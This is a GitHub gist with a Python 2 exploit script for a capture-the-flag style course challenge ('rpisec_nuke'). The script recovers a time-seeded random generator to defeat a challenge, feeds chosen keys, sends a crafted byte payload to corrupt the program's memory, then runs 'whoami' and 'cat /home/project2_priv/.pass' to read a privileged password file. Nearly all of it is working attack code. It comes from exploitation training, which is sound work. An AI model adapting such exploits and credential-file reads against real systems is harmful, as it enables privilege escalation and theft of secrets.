Create a gist now

Instantly share code, notes, and snippets.

#!/usr/bin/env python
# project 1 helper script
import subprocess
import binascii
import struct
import sys
import ctypes
import time
from operator import xor
def signThis(i):
return ctypes.c_int32(i).value
# function to read the file descriptor until it finds a string
def readuntil(fd, needle):
data = ""
while needle not in data:
data += fd.read(1)
return data
def dumpOutput(fd):
print "+---------------+"
print "|****DUMPING****|"
print "+---------------+"
while True:
sys.stdout.write(fd.read(1))
def tohex(val, nbits):
return hex((val + (1 << nbits)) % (1 << nbits))
def dots(x):
splitSize = 2
ret = [x[i:i+splitSize] for i in range(0, len(x), splitSize)]
return '.'.join(ret)
def xorChallenges(first_challenge, challenge):
first_challenge = [''.join(x.split('.')) for x in first_challenge]
challenge = [''.join(x.split('.')) for x in challenge]
splitSize = 2
for j in xrange(len(first_challenge)):
x = first_challenge[j]
first_challenge[j] = [x[i:i+splitSize] for i in range(0, len(x), splitSize)]
for j in xrange(len(challenge)):
x = challenge[j]
challenge[j] = [x[i:i+splitSize] for i in range(0, len(x), splitSize)]
# Xor all the values together
xored = []
for j in xrange(len(challenge)):
x = challenge[j]
y = first_challenge[j]
xored.append([])
for k in xrange(len(x)):
a = ctypes.c_ubyte(int(x[k],16)).value
b = ctypes.c_ubyte(int(y[k],16)).value
xoval = hex(ctypes.c_ubyte(a ^ b).value)
xored[j].append(xoval)
for i in xrange(len(xored)):
line = xored[i]
xored[i] = "".join(["00"[len(x[2:]):]+x[2:] for x in line])
return xored
def findChallenge(cline, ctime, offset):
# Get our random numbers ( 4 needed )
crand.seed_rand(ctime)
rNums = []
for _ in xrange(offset):
crand.get_random()
for _ in xrange(4):
rNums.append(crand.get_random())
# Get the integer values for xoring
cline = ''.join(cline.split('.'))
splitSize = 8
words = [cline[i:i+splitSize] for i in range(0, len(cline), splitSize)]
# This flips for little endian
for wi in xrange(len(words)):
w = words[wi]
splitSize = 2
words[wi] = ''.join([w[i:i+splitSize] for i in range(0, len(w), splitSize)[::-1]])
intVals = [ signThis(int('0x'+x,16)) for x in words ]
# Xor all the values together
xored = []
for i in range(4):
a = rNums[i]
b = intVals[i]
xored.append(ctypes.c_uint32(a ^ b).value)
# Turn the int values back to hex
xoredHex = [ tohex(x,32)[2:-1] for x in xored ]
# Pad those values with 0's for the memory
xoredHex = [ "00000000"[len(x):]+x for x in xoredHex ]
# Flip them for memory order
for xi in xrange(len(xoredHex)):
x = xoredHex[xi]
splitSize = 2
xoredHex[xi] = ''.join([x[i:i+splitSize] for i in range(0, len(x), splitSize)[::-1]])
cAns = ''.join(xoredHex)
#splitSize = 2
#cAns = [cAns[i:i+splitSize] for i in range(0, len(cAns), splitSize)]
#cAns = '.'.join(cAns)
return cAns
# Import our rand seeder
crand = ctypes.cdll.LoadLibrary("./randlib.so")
crand.seed_rand(int(time.time()))
# run the project
#p = subprocess.Popen('nc warzone.rpis.ec 31337', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
#p = subprocess.Popen('/tmp/bleached/project2/rpisec_nuke', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
p = subprocess.Popen('strace /tmp/bleached/project2/rpisec_nuke', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
key2 = '00112233445566778899aabbccddeeff'
key3 = ['00112233000000000000000000000000', '00000000445566770000000000000000', '00000000000000008899aabb00000000', '000000000000000000000000ccddeeff']
#key2 = '4e96e75bd2912e31f3234f6828a4a897'
#key3 = ['90357303000000000000000000000000', '00000000412ef8220000000000000000', '0000000000000000cd10e79800000000', '000000000000000000000000760491a6']
#############
# Third Key #
#############
p.stdin.write("3\n")
session = int(readuntil(p.stdout, "]=---------=|").split('\n')[-1].split(' ')[4][7:-7])
p.stdin.write(str(session)+"\n")
print readuntil(p.stdout, "CHALLENGE (64 Bytes):")
#GET CHALLENGE, GET TIME NOW
challenge = readuntil(p.stdout, "-------------------------------------------------------\n")
challenge = challenge.split("\n")[1:5]
challenge[0] = challenge[0][7:]
challenge = [l[30:] for l in challenge]
print readuntil(p.stdout, "TIME NOW:")
challenge_time = readuntil(p.stdout, "\n")
challenge_time = int(challenge_time.strip()[7:])
# Get the seed
CLine = challenge[0]
seed = 0
for x in range(50):
seed = ctypes.c_uint32(challenge_time + session - x).value
if findChallenge(CLine, seed,0) == "00000000000000000000000000000000":
break
offset = 4
for x in xrange(4):
challenge[x%4] = findChallenge(challenge[x%4], seed, offset*4)
offset += 1
# Finally xor with the first_challenge to get the leak
challenge = xorChallenges(key3, challenge)
challenge_input = ''.join(challenge)
p.stdin.write(challenge_input+"\n")
##############
# Second Key #
##############
p.stdin.write("2\n")
print readuntil(p.stdout, "ENTER AES-128 CRYPTO KEY:")
p.stdin.write(key2 + "\n")
print readuntil(p.stdout, "ENTER LENGTH OF DATA (16 OR 32):")
p.stdin.write("\n")
print readuntil(p.stdout, "DATA LENGTH SET TO")
p.stdin.write("\n")
print readuntil(p.stdout, "AUTHENTICATING")
p.stdin.write("\n")
#############
# First Key #
#############
p.stdin.write("1\n")
p.stdin.write("\x00\n")
p.stdin.write("\n")
print readuntil(p.stdout, "+-----------------------------------------------------+")
###################
# ON TO BOOM BOOM #
###################
p.stdin.write("4\n")
print readuntil(p.stdout, "READY")
# My Program
#program = "ADOOM\x00\x00\x00" # 8 bytes
program = "I"*132 + "S"+'A'+"IS"+'A'+"IS"+'A'+"IS"+'A'+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00"
#program = "S"+'G'+"IS"+'E'+"IS"+'N'+"IS"+'E'+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00"
#program = "I"*62 + "OIOIOIOI"
#program = "I"*132 + "S"+s[3]+"IS"+s[2]+"IS"+s[1]+"IS"+s[0]+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00"
p.stdin.write(program*2)
p.stdin.write("\xa9\x59\xdc\xdc"+"\x4a\x00\x00\x00\x40\x45\x4e\x44\n")
p.stdin.write("\n")
p.stdin.write("CONFIRM\n")
dumpOutput(p.stdout)
print readuntil(p.stdout, "CYBER NUKE IS LAUNCHING")
print readuntil(p.stdout, "ATTEMPTING TO CONNECT TO UPLINK")
print readuntil(p.stdout, "EXECUTING...")
print readuntil(p.stdout, "MISSION SUCCESS")
# Got Root?
time.sleep(0.5)
p.stdin.write("whoami\n")
time.sleep(0.5)
p.stdin.write("cat /home/project2_priv/.pass\n")
dumpOutput(p.stdout)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment